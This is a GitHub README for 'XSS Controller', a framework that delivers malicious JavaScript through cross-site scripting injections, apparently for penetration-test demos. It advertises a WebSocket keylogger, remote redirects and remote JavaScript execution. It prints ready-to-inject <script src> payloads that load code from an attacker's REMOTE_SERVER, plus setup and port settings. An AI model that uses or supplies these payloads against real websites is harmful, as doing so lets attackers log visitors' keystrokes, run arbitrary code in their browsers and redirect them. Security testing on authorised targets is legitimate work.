Skip to content

Latest commit

 

History

History
55 lines (39 loc) · 978 Bytes

README.md

File metadata and controls

55 lines (39 loc) · 978 Bytes
Raw

XSS Controller

XSS Controller is a framework to deliver malicious javascript inside XSS payloads and make better PoC to demonstrate the impact of successful XSS exploration.

Features

  • KeyLogger via WebSocket
  • Remote redirect
  • Remote JavaScript Execution

Setup

./setup.sh
npm i

Running

npm start

Inject XSS payload to invoke remote javascript.

<script src="https://REMOTE_SERVER:8443/"></script>
<script src="http://REMOTE_SERVER:8080/"></script>

By default the server is up in 8080 port to HTTP Server and 8443 to HTTPS. This config can be changed in /app/server.js in config variable.

// Config ports to listen on
const config = {
  HTTPS_PORT: 8443,
  HTTP_PORT: 8080,
  WEB_SOCKET_PORT: 3000,
};

Execution

npm i
npm start

Inspíration

This project was created based on xss-keylogger by hadynz.